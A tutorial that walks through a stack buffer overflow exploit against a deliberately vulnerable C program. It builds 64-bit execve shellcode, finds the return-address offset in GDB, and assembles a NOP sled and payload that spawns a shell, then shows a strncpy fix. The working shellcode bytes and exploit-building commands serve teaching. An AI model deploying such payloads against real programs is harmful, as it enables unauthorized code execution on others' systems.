Unsafe function vulnerabilities in C

Introduction

It is well known that C gives you a lot of freedom in memory management, with both advantages and drawbacks. On this page I walk through an example of vulnerability analysis to show that something that looks harmless, or like a mere “segmentation fault”, can, depending on the application, turn into a real security vulnerability.

Environment

Element	Version
Operating System	Ubuntu 24.04.3 LTS
Architecture	x86_64 (64 bits)
GCC	13.3.0
OBJDUMP	2.42
LD	2.42
NASM	2.16.01

The vulnerable program

This is an example of a typical (unsafe) use of an insecure function, strcpy(), which copies bytes from the source into the destination until it finds a null terminator (\0) in the source, regardless of how large the destination is.

#include <stdio.h>
#include <string.h>

void copy_info(char *info)
{
    char buf[80];
    strcpy(buf, info);

    printf("Introduced text: %s\n", buf);
}

int main(int argc, char *argv[]) {
    copy_info(argv[1]);

    return 0;
}

The risk arises because strcpy() never checks the size of the destination buffer. If the input is longer than 79 characters plus the terminator, the copy overflows buf and writes into adjacent stack memory, outside of our “variable”.

In order to compile the example, we need to use the following command:

gcc -m64 -fno-stack-protector -z execstack -no-pie example.c -o example

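-m64 : Generates 64-bit code (already the default on this platform; stated for clarity).
-fno-stack-protector : Disables stack canaries, a compiler mechanism that detects an overwritten stack frame when the function returns and aborts the program. We turn it off because otherwise the overflow would be detected before our code runs.
-z execstack : Marks the stack as executable, so code placed on it can run.
-no-pie : Builds a non-position-independent executable, so the program's own code and data are loaded at fixed addresses. This does not fix the stack address by itself: that depends on ASLR (Address Space Layout Randomization), which is configured at the operating-system level. Fixed addresses are recommended for demonstration purposes because they make the exploit reproducible.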

Then we run it:

$ ./example "hello"
Introduced text: hello

Let’s see how we can take advantage of the unsafe use of that function to open a shell. Here the string comes from a command-line argument, but it could come from any other source.

Creating the shellcode

There are many ready-made shellcodes available online, but for learning purposes we will create our own.

The easiest way to do this is to let the compiler (gcc) generate it for us.

First, we write a small C program that simply spawns a shell:

#include <unistd.h>
int main( )
{
  char* argv[2];
  argv[0] = "/bin/sh";
  argv[1] = 0;
  execve("/bin/sh", argv, NULL);
  return 0;
}

Then compile it:

gcc -m64 -O0 -no-pie -fno-stack-protector shellcode.c -o shellcode

And dump the code with objdump:

0000000000401136 <main>:
  401136: f3 0f 1e fa           endbr64
  40113a: 55                    push   rbp
  40113b: 48 89 e5              mov    rbp,rsp
  40113e: 48 83 ec 10           sub    rsp,0x10
  401142: 48 8d 05 bb 0e 00 00  lea    rax,[rip+0xebb]        # 402004 <_IO_stdin_used+0x4>
  401149: 48 89 45 f0           mov    QWORD PTR [rbp-0x10],rax
  40114d: 48 c7 45 f8 00 00 00  mov    QWORD PTR [rbp-0x8],0x0
  401154: 00
  401155: 48 8d 45 f0           lea    rax,[rbp-0x10]
  401159: ba 00 00 00 00        mov    edx,0x0
  40115e: 48 89 c6              mov    rsi,rax
  401161: 48 8d 05 9c 0e 00 00  lea    rax,[rip+0xe9c]        # 402004 <_IO_stdin_used+0x4>
  401168: 48 89 c7              mov    rdi,rax
  40116b: e8 d0 fe ff ff        call   401040 <execve@plt>
  401170: b8 00 00 00 00        mov    eax,0x0
  401175: c9                    leave
  401176: c3                    ret

We cannot use this code directly as shellcode because it contains too much “noise” (stack setup, argument handling, a string literal loaded from .rodata, etc.). It also calls execve() through the PLT, which relies on the dynamic linker and libc; injected code has to invoke the system call directly.

The logic itself is quite simple: it loads the three arguments into rdi, rsi and rdx, and then calls the function.

That is the part we want to reproduce in the shellcode. Note that the second argument, argv, is an array of pointers terminated by a NULL pointer, and the third, envp, is simply NULL (zero).

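The bigger issue is that the string literal /bin/sh is loaded from the read-only data section, and we need to embed it directly in the code. A neat trick is to treat the string as a 64-bit integer that can be loaded into a register with a single instruction. Writing the path as /bin//sh (the kernel ignores the extra slash) makes it exactly 8 bytes long, so it fills the register without introducing a null byte, which matters because strcpy() would stop copying at the first null byte. I used Python to perform the conversion.

$ python3
>>> n = int.from_bytes(b'/bin//sh', 'little')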
>>> hex(n)
'0x68732f2f6e69622f'
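
As a quick cross-check of this conversion, here is a minimal Python sketch. The helper name pack_path is made up for illustration, and it assumes the path is exactly 8 bytes long, which is why the 8-byte spelling /bin//sh is used rather than the 7-byte /bin/sh.

```python
def pack_path(path: bytes) -> int:
    """Pack an 8-byte path into a 64-bit little-endian integer (hypothetical helper)."""
    if len(path) != 8:
        raise ValueError("path must be exactly 8 bytes to fill a 64-bit register")
    if b"\x00" in path:
        raise ValueError("path must not contain null bytes")
    return int.from_bytes(path, "little")


value = pack_path(b"/bin//sh")
print(hex(value))                                   # 0x68732f2f6e69622f
# The 7-byte spelling gives a shorter value, whose top byte would be a null:
print(hex(int.from_bytes(b"/bin/sh", "little")))    # 0x68732f6e69622f
```

Converting the integer back with value.to_bytes(8, "little") returns the original bytes, which is a handy way to confirm the byte order.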

So the final nasm code would be:

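BITS 64
global _start

_start:
    endbr64
    push   rbp
    mov    rbp,rsp
    sub    rsp,0x10

    xor rax, rax                  ; rax = 0
    push rax                      ; 8 zero bytes: terminator for the path string

    mov rax, 0x68732f2f6e69622f   ; "/bin//sh" as a little-endian 64-bit value
    push rax                      ; the stack now holds "/bin//sh" followed by zeros

    mov rdi, rsp                  ; 1st argument: pointer to the path

    xor rax, rax
    push rax                      ; NULL pointer, used as an empty argv array

    mov rsi, rsp                  ; 2nd argument: argv = { NULL }
    xor rdx, rdx                  ; 3rd argument: envp = NULL
    mov al, 59                    ; syscall number 59 = execve on x86_64 (rax is already 0)
    syscall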

By using nasm and ld we can test it:

$ nasm -f elf64 shellcode.nasm
$ ld shellcode.o -o shellcode

$ ./shellcode
$ > whoami
fiti
$ > exit
$

Great, now we need to “extract” the shellcode from it. In other words, get the raw machine code that we need to “inject” into the vulnerable program.

Since we need the instruction bytes in hexadecimal, I used objdump for that.

objdump -d -M intel64 shellcode.o

shellcode.o:    file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <_start>:

    0:    f3 0f 1e fa       endbr64
    4:    55                push   %rbp
    5:    48 89 e5          mov    %rsp,%rbp
    8:    48 83 ec 10       sub    $0x10,%rsp
    
    ..... etc ...

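Note: In the final payload I changed the immediate byte of the sub instruction from 0x10 to 0x80, so that the shellcode's own push instructions do not overwrite the shellcode itself. Because this is an 8-bit sign-extended immediate, 0x80 means -128: the instruction actually moves rsp 128 bytes up, away from the buffer, rather than reserving 128 bytes below it. What matters is that the pushes land clear of the shellcode.

All we need to do is copy the hexadecimal bytes of the shellcode and build a string by escaping each of them with \x: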

\xf3\x0f\x1e\xfa\x55\x48\x89\xe5\x48\x83\xec\x10\x48\x31\xc0\x50\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xc0\x50\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05
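
Copying the bytes by hand is error-prone, so this step can also be scripted. The following is a minimal Python sketch, not the method used above. The function names are invented for illustration, and the regular expression assumes the usual objdump -d layout of offset, colon, hex bytes, then mnemonic.

```python
import re


def objdump_to_bytes(listing: str) -> bytes:
    """Collect the opcode bytes from objdump -d style lines (hypothetical helper)."""
    out = bytearray()
    for line in listing.splitlines():
        # Assumed line shape: "<offset>:  <hex bytes>   <mnemonic ...>"
        match = re.match(r"\s*[0-9a-f]+:\s+((?:[0-9a-f]{2} )+)", line)
        if match:
            out += bytes.fromhex(match.group(1))
    return bytes(out)


def to_escaped(code: bytes) -> str:
    """Render bytes as a \\xNN escaped string."""
    return "".join(f"\\x{b:02x}" for b in code)


sample = """
    0:    f3 0f 1e fa       endbr64
    4:    55                push   %rbp
    5:    48 89 e5          mov    %rsp,%rbp
    8:    48 83 ec 10       sub    $0x10,%rsp
"""
code = objdump_to_bytes(sample)
print(to_escaped(code))        # \xf3\x0f\x1e\xfa\x55\x48\x89\xe5\x48\x83\xec\x10
print(b"\x00" in code)         # False: no null byte that would stop strcpy()
```

The null-byte check is the important part: any \x00 in the result would end the copy performed by strcpy() early.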

Now we are ready to inject the shellcode into our test program!

Injecting the shellcode

There are several things we need to know to inject the shellcode, but the most important is the address of the buffer on the stack. With ASLR disabled, this address is the same for every execution. GDB disables ASLR for the program it debugs by default; outside GDB it can be turned off for a single run with setarch -R, or system-wide through /proc/sys/kernel/randomize_va_space. With ASLR enabled things get more complicated, because the stack address changes on every run. In that case “brute force” can be used: run the program many times until a guess hits the right address.
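
Before debugging, it can help to check how ASLR is configured on the machine. The sketch below is a small Python helper with invented names; it assumes a Linux system that exposes the setting in /proc/sys/kernel/randomize_va_space, and falls back to a message when the file is missing.

```python
from pathlib import Path

# Meaning of the values, as documented for the Linux kernel sysctl.
ASLR_MODES = {
    0: "off: no address space randomization",
    1: "partial: stack, mmap base and shared libraries are randomized",
    2: "full: as mode 1, plus the heap (brk) is randomized",
}


def describe_aslr(raw: str) -> str:
    """Translate the raw sysctl value into a short description."""
    try:
        return ASLR_MODES.get(int(raw.strip()), "unknown setting")
    except ValueError:
        return "unknown setting"


def current_aslr(path: str = "/proc/sys/kernel/randomize_va_space") -> str:
    """Read the setting if the file exists (Linux only)."""
    p = Path(path)
    return describe_aslr(p.read_text()) if p.exists() else "not available on this system"


print(current_aslr())
```

On a default installation the value is typically 2, which is why the stack address changes between runs outside GDB.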

Let’s explore it with GDB:

gdb example

The first thing to do is to find where the return address of copy_info() is stored. For that, we can disassemble main() and put a breakpoint just before the call to copy_info():

(gdb) disassemble main
Dump of assembler code for function main:
   0x0000000000401197 <+0>:	endbr64
   0x000000000040119b <+4>:	push   %rbp
   0x000000000040119c <+5>:	mov    %rsp,%rbp
   0x000000000040119f <+8>:	sub    $0x10,%rsp
   0x00000000004011a3 <+12>:	mov    %edi,-0x4(%rbp)
   0x00000000004011a6 <+15>:	mov    %rsi,-0x10(%rbp)
   0x00000000004011aa <+19>:	mov    -0x10(%rbp),%rax
   0x00000000004011ae <+23>:	add    $0x8,%rax
   0x00000000004011b2 <+27>:	mov    (%rax),%rax
=> 0x00000000004011b5 <+30>:	mov    %rax,%rdi
   0x00000000004011b8 <+33>:	call   0x401156 <copy_info>
   0x00000000004011bd <+38>:	mov    $0x0,%eax
   0x00000000004011c2 <+43>:	leave
   0x00000000004011c3 <+44>:	ret

Then put a breakpoint at 0x4011b5.

(gdb) b *0x4011b5
Breakpoint 1 at 0x4011b5

And, for an initial test, run the program with a string of A’s as input.

(gdb) r "AAAAAAAAAA"

Then use stepi (or si) twice to step into the copy_info() call. Remember that the first thing the call instruction does is push the return address onto the stack. So, by printing the stack pointer right after the call, we find where the return address is stored:

(gdb) r "AAAAAAAAAA"
Starting program: /home/fiti/Repositories/PRAC/example "AAAAAAAAAA"
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, 0x00000000004011b5 in main ()
(gdb) si
0x00000000004011b8 in main ()
(gdb) si
0x0000000000401156 in copy_info ()
(gdb) x $rsp
0x7fffffffdc38:	0x004011bd

So the return address is, as expected, 0x4011bd (the instruction after the call, as seen in the disassembly), and it is stored at 0x7fffffffdc38. Remember this address. It is the key: this is the location we want to overwrite, replacing the return address with the address where the shellcode is stored.

The next thing to do is to see how the vulnerable function works. Let’s put a breakpoint right after the call to strcpy():

(gdb) disassemble copy_info
Dump of assembler code for function copy_info:
=> 0x0000000000401156 <+0>:	endbr64
   0x000000000040115a <+4>:	push   %rbp
   0x000000000040115b <+5>:	mov    %rsp,%rbp
   0x000000000040115e <+8>:	sub    $0x60,%rsp
   0x0000000000401162 <+12>:	mov    %rdi,-0x58(%rbp)
   0x0000000000401166 <+16>:	mov    -0x58(%rbp),%rdx
   0x000000000040116a <+20>:	lea    -0x50(%rbp),%rax
   0x000000000040116e <+24>:	mov    %rdx,%rsi
   0x0000000000401171 <+27>:	mov    %rax,%rdi
   0x0000000000401174 <+30>:	call   0x401050 <strcpy@plt>
   0x0000000000401179 <+35>:	lea    -0x50(%rbp),%rax
   0x000000000040117d <+39>:	mov    %rax,%rsi
   0x0000000000401180 <+42>:	lea    0xe7d(%rip),%rax        # 0x402004
   0x0000000000401187 <+49>:	mov    %rax,%rdi
   0x000000000040118a <+52>:	mov    $0x0,%eax
   0x000000000040118f <+57>:	call   0x401060 <printf@plt>
   0x0000000000401194 <+62>:	nop
   0x0000000000401195 <+63>:	leave
   0x0000000000401196 <+64>:	ret
End of assembler dump.
(gdb) b *0x401179
Breakpoint 2 at 0x401179
(gdb) c
Continuing.

Breakpoint 2, 0x0000000000401179 in copy_info ()

Let’s inspect the stack right now:

(gdb) x/50gx $rsp
0x7fffffffdbd0:	0x0000000006000000	0x00007fffffffe118
0x7fffffffdbe0:	0x4141414141414141	0x00007fffff004141  <--- Here is our string
0x7fffffffdbf0:	0x0000006100000019	0x0000000000000000
0x7fffffffdc00:	0x0000000000000000	0x0000000000000000
0x7fffffffdc10:	0x0000000000000000	0x0000000000000000
0x7fffffffdc20:	0x0000000000000000	0x0000000000000000
0x7fffffffdc30:	0x00007fffffffdc50	0x00000000004011bd  <--- Here is the return addr!
0x7fffffffdc40:	0x00007fffffffdd78	0x00000002ffffdd78
0x7fffffffdc50:	0x00007fffffffdcf0	0x00007ffff7c2a1ca
 .... snip ....
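
The dump shows memory as 64-bit little-endian words, which makes the string harder to recognize. As a reading aid, this small Python sketch converts the two words at 0x7fffffffdbe0 back into the bytes as they sit in memory. The helper name is made up for illustration.

```python
def qword_bytes(value: int) -> bytes:
    """Return the 8 bytes of a 64-bit value in memory (little-endian) order."""
    return value.to_bytes(8, "little")


first = qword_bytes(0x4141414141414141)
second = qword_bytes(0x00007FFFFF004141)
print(first)     # b'AAAAAAAA'
print(second)    # b'AA\x00\xff\xff\x7f\x00\x00'

# Reading up to the first null byte recovers the string that strcpy() wrote.
print((first + second).split(b"\x00")[0])    # b'AAAAAAAAAA'
```

The second word holds the last two A’s and the terminator written by strcpy(); its remaining five bytes are simply whatever was on the stack before the copy.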

The picture is now pretty clear: we need to write our shellcode into the buffer and overwrite the value stored at 0x7fffffffdc38 with the address where our code starts. So we need to calculate exactly how many bytes must be written before the return address. The shellcode will probably be shorter than that, so we prepend NOP instructions to fill the gap. Remember that when the CPU executes a NOP it simply moves on to the next instruction, so execution slides through the padding like a cascade until it reaches our shellcode.

In human words, what we want to achieve is:

(gdb) x/50gx $rsp
0x7fffffffdbd0:	0x0000000006000000	0x00007fffffffe118
0x7fffffffdbe0:	0xnopnopnopnop    	0xnopnopnopnop
0x7fffffffdbf0:	0xnopnopnopnop    	0xnopnopnopnop
0x7fffffffdc00:	0xnopnopnopnop    	0xnop+myshellcode
0x7fffffffdc10:	0xmyshellcode     	0xmyshellcode
0x7fffffffdc20:	0xmyshellcode     	0xmyshellcode
0x7fffffffdc30:	0xmyshellcode     	0x00007fffffffdbe0  <--- Overwritten return address!
0x7fffffffdc40:	0x00007fffffffdd78	0x00000002ffffdd78
0x7fffffffdc50:	0x00007fffffffdcf0	0x00007ffff7c2a1ca
 .... snip ....

The exact number of bytes to write before the return address can be calculated within GDB, by subtracting the start address of the buffer from the address where the return address is stored:

(gdb) print (0x7fffffffdc38-0x7fffffffdbe0)
$1 = 88

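The return address is stored 88 bytes past the start of buf, so the payload must contain exactly 88 bytes (NOP padding plus shellcode) before the new return address. Our shellcode is 44 bytes long, so we need 88-44=44 bytes of padding. The new return address, 0x7fffffffdbe0, is then appended in little-endian byte order. Only its 6 non-zero bytes are written (e0 db ff ff ff 7f): the two high bytes are zero, cannot be passed inside a command-line argument, and are already zero in the original return address. The whole payload is therefore 44+44+6=94 bytes.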
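
The layout arithmetic is easy to get wrong, so here is a minimal Python sketch that recomputes it from the addresses seen in GDB. The constant names are mine. The key point is that the 88 bytes before the return address are filled by padding plus shellcode only, and the new return address comes after them, which gives 88 - 44 = 44 bytes of padding.

```python
import struct

BUF_START = 0x7FFFFFFFDBE0    # address of buf, taken from the stack dump
RET_SLOT = 0x7FFFFFFFDC38     # where the saved return address is stored
SHELLCODE_LEN = 44            # bytes, counted from the escaped string

# Number of bytes to fill before reaching the return address.
offset = RET_SLOT - BUF_START
# Cross-check from the disassembly: buf is at rbp-0x50, the return address at rbp+8.
assert offset == 0x50 + 8

padding_len = offset - SHELLCODE_LEN

# Little-endian encoding of the target address. The two high zero bytes are
# dropped because they cannot travel inside a C string; the bytes already in
# memory at those positions are zero anyway.
ret_bytes = struct.pack("<Q", BUF_START).rstrip(b"\x00")

total = padding_len + SHELLCODE_LEN + len(ret_bytes)
print(offset, padding_len, ret_bytes.hex(), total)    # 88 44 e0dbffffff7f 94
```

These addresses are specific to the debugging session shown here; on another machine, or outside GDB, BUF_START and RET_SLOT will differ, but their difference should stay at 88 for this binary.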

We can write the shellcode to a file directly from the shell (or using Python, Perl, or whatever you like the most):

printf '\xf3\x0f\x1e\xfa\x55\x48\x89\xe5\x48\x83\xec\x80\x48\x31\xc0\x50\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xc0\x50\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05' > shellcode.bin

We do the same for padding.bin (NOP instructions, opcode \x90) and retaddr.bin (the target address in little-endian byte order), and then concatenate the three files to get our final exploit:

cat padding.bin shellcode.bin retaddr.bin > exploit.bin

And if we finally execute the original program by passing our exploit as input, we are able to open a shell:

$ ./example $(cat exploit.bin)
Introduced text: ����������������������������������������������UH��H��H1�PH�/bin//shPH��H1�PH��H1Ұ;����
whoami
fiti
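
Passing binary data through $(cat exploit.bin) only works if the bytes survive the shell: a null byte ends a C string, and an unquoted command substitution is split on spaces, tabs and newlines. The following Python sketch checks a payload for those bytes. The function name is invented for illustration, and the payload is rebuilt from the bytes shown above, assuming 44 bytes of NOP padding.

```python
def argv_problems(payload: bytes) -> list:
    """List the reasons a payload would not survive as a single argv entry."""
    problems = []
    if b"\x00" in payload:
        problems.append("contains a null byte (C strings end there)")
    if any(b in payload for b in b" \t\n"):
        problems.append("contains whitespace (an unquoted $(...) is split on it)")
    return problems


shellcode = bytes.fromhex(
    "f30f1efa554889e54883ec80"      # endbr64; push rbp; mov rbp,rsp; sub rsp,imm8
    "4831c050"                      # xor rax,rax; push rax
    "48b82f62696e2f2f736850"        # mov rax,"/bin//sh"; push rax
    "4889e74831c0504889e6"          # mov rdi,rsp; xor rax,rax; push rax; mov rsi,rsp
    "4831d2b03b0f05"                # xor rdx,rdx; mov al,59; syscall
)
payload = b"\x90" * 44 + shellcode + bytes.fromhex("e0dbffffff7f")

print(len(shellcode), len(payload))    # 44 94
print(argv_problems(payload))          # []
```

If the target address ever contained one of these bytes (for example a 0x20 or 0x0a), the exploit would need a different landing address inside the NOP padding.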

Important:

GDB is a good playground, but it can be a bit misleading: it changes the environment of the program (for example, it sets the LINES and COLUMNS variables and runs the program with its full path), which shifts the addresses on the stack. As a consequence, your exploit may work inside GDB but not outside it, where you will likely get a segmentation fault instead. If core dumps are enabled, this is actually very useful, because you can open the dump with gdb example core, inspect where the buffer really is, and adjust the exploit for your specific scenario.

Conclusion

C is a brilliant and powerful language that provides a lot of flexibility in memory management. However, improper use can cause significant security vulnerabilities.

In our example, we were able to open a shell from a simple program that was definitely not intended for that. A safer approach for the copy_info() function would be:

void copy_info(char *info)
{
    char buf[80];
    strncpy(buf, info, sizeof(buf) - 1); // <--- FIX: copy at most 79 bytes
    buf[sizeof(buf) - 1] = '\0';         // <--- Force the null termination.

    printf("Introduced text: %s\n", buf);
}

By using strncpy(), we limit the number of bytes copied, preventing the overflow.
Forcing the null terminator is necessary because strncpy() does not add one when the source is as long as, or longer than, the limit. It ensures that later calls to string functions are safe (remember that, in C, a string is just a null-terminated array of chars).
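
To make the termination issue concrete, here is a small Python model of the behavior. It is only a model of the C semantics written for illustration, not C code, and both function names are invented.

```python
def strncpy_model(src: bytes, n: int) -> bytes:
    """Model of C strncpy(): the n bytes that end up in the destination.

    src is the string content without its terminating null.
    """
    copied = src[:n]
    # Null padding is added only when the source is shorter than n.
    return copied + b"\x00" * (n - len(copied))


def safe_copy_model(src: bytes, size: int) -> bytes:
    """Model of the fixed copy_info(): strncpy(buf, info, size - 1); buf[size - 1] = 0."""
    return strncpy_model(src, size - 1) + b"\x00"


long_input = b"A" * 100
print(b"\x00" in strncpy_model(long_input, 80))    # False: no terminator at all
fixed = safe_copy_model(long_input, 80)
print(len(fixed), fixed.endswith(b"\x00"))         # 80 True
```

With a 100-byte input, the plain strncpy() call leaves the buffer unterminated, while the fixed version always fits in 80 bytes and always ends with a null, at the cost of silently truncating the input.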